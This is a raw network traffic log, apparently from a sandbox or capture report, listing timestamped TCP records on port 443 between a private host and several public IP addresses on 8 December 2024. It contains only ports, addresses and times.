                                                                                                                                Dec 8, 2024 01:46:10.156656027 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:10.156936884 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:10.156948090 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:11.378088951 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:11.378176928 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:11.596292019 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:11.596313000 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:11.596548080 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:11.597664118 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:11.597836018 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:11.597863913 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:11.597929955 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:11.597939014 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:12.656116009 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:12.656188965 CET44349897104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:12.656348944 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:12.656366110 CET49897443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:12.758829117 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:12.758877039 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:12.758944988 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:12.759505987 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:12.759520054 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:13.971308947 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:13.971378088 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:13.972537041 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:13.972549915 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:13.972748041 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:13.973856926 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:13.973958969 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:13.973988056 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:14.981089115 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:14.981153965 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:14.981214046 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:14.981389999 CET49902443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:14.981410027 CET44349902104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:14.995150089 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:14.995162010 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:14.995242119 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:14.995524883 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:14.995534897 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:16.219434023 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:16.219501019 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:16.220786095 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:16.220791101 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:16.220985889 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:16.222105980 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:16.222181082 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:16.222184896 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:17.335139990 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:17.335243940 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:17.335306883 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:17.335423946 CET49908443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:17.335432053 CET44349908104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:17.375080109 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:17.375113964 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:17.375207901 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:17.375432968 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:17.375449896 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:18.586108923 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:18.586208105 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:18.587591887 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:18.587601900 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:18.587802887 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:18.589004993 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:18.589101076 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:18.589107990 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:19.376512051 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:19.376581907 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:19.376652956 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:19.376846075 CET49915443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:19.376861095 CET44349915104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:19.380032063 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:19.380052090 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:19.380131960 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:19.380425930 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:19.380435944 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:20.603678942 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:20.603873968 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:20.605103016 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:20.605110884 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:20.605308056 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:20.606611013 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:20.606642962 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:20.606673956 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:21.457514048 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:21.457581043 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:21.457633972 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:21.457801104 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:21.457809925 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:21.457853079 CET49920443192.168.2.4104.21.36.51
                                                                                                                                Dec 8, 2024 01:46:21.457858086 CET44349920104.21.36.51192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:21.598870039 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:21.598901987 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:21.598977089 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:21.599278927 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:21.599293947 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:22.813677073 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:22.813736916 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:22.815567017 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:22.815577030 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:22.815781116 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:22.817060947 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:22.859329939 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:23.449717999 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:23.449796915 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:23.449863911 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:23.450037003 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:23.450057983 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:23.450068951 CET49926443192.168.2.4104.20.4.235
                                                                                                                                Dec 8, 2024 01:46:23.450073957 CET44349926104.20.4.235192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:24.147629023 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:24.147645950 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:24.147711039 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:24.148010015 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:24.148022890 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:25.362931013 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:25.362993002 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:25.364597082 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:25.364604950 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:25.364804983 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:25.365938902 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:25.407350063 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.016318083 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.016360998 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.016455889 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:26.016467094 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.016608000 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.016638994 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.016659975 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:26.016669035 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.016707897 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:26.016998053 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.021285057 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.021325111 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:26.021331072 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.021465063 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:26.021476984 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.021483898 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:26.021574974 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.021600008 CET44349933104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:26.021612883 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:26.021651030 CET49933443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:31.197021961 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:31.197042942 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:31.197114944 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:31.205301046 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:31.205319881 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.016124010 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.016196012 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:33.017713070 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:33.017724037 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.017930984 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.025477886 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:33.071321011 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.734353065 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.734400988 CET44349949180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:33.734442949 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:33.739281893 CET49949443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:34.245834112 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:34.245867968 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:34.245928049 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:34.246210098 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:34.246225119 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.058581114 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.058670998 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:36.059906006 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:36.059912920 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.060115099 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.061806917 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:36.103337049 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.987895966 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.987916946 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.987930059 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.988051891 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:36.988071918 CET44349959180.163.242.102192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:36.988123894 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:36.989963055 CET49959443192.168.2.4180.163.242.102
                                                                                                                                Dec 8, 2024 01:46:38.133728027 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:38.133738041 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:38.133810997 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:38.134031057 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:38.134040117 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.322868109 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.323060036 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.323071003 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.323708057 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.325171947 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.325176954 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.325413942 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.326792955 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.367331028 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.856364012 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.864763021 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.864844084 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.864852905 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.864901066 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.881632090 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.881716967 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.898521900 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.898595095 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:40.907069921 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:40.907129049 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:41.062107086 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:41.062114954 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:41.062187910 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:41.062196016 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:41.076874018 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:41.076939106 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:41.076940060 CET44349970103.235.47.188192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:41.076984882 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:41.077275038 CET49970443192.168.2.4103.235.47.188
                                                                                                                                Dec 8, 2024 01:46:42.098390102 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:42.098402977 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:42.098464966 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:42.098705053 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:42.098714113 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.311047077 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.311155081 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.317161083 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.317173958 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.317395926 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.319380999 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.363337994 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.902637959 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.902672052 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.902772903 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.902781010 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.902915001 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.902947903 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.902990103 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.902996063 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.903050900 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.905407906 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.913831949 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.913886070 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.913891077 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.922249079 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.922302008 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:43.922307968 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:43.963954926 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.022066116 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.073332071 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.073338985 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.098546028 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.098628044 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.098632097 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.106693983 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.106755018 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.106760025 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.114819050 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.114911079 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.114914894 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.123022079 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.123087883 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.123092890 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.131124020 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.131176949 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.131181955 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.139266014 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.139331102 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.139333963 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.147422075 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.147468090 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.147476912 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.163515091 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.163575888 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.163580894 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.169984102 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.170051098 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.170056105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.176420927 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.176470041 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.176477909 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.182966948 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.183037996 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.183043003 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.189371109 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.189425945 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.189435005 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.245116949 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.286489964 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.289112091 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.289167881 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.289174080 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.298991919 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.298999071 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.299057961 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.299062014 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.308659077 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.308710098 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.308715105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.308759928 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.313188076 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.313242912 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.321763039 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.321769953 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.321845055 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.330071926 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.330080986 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.330148935 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.334409952 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.334415913 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.334482908 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.342727900 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.342734098 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.342820883 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.350967884 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.351056099 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.359358072 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.359437943 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:46:44.363636971 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:46:44.363697052 CET49979443192.168.2.4104.21.26.127
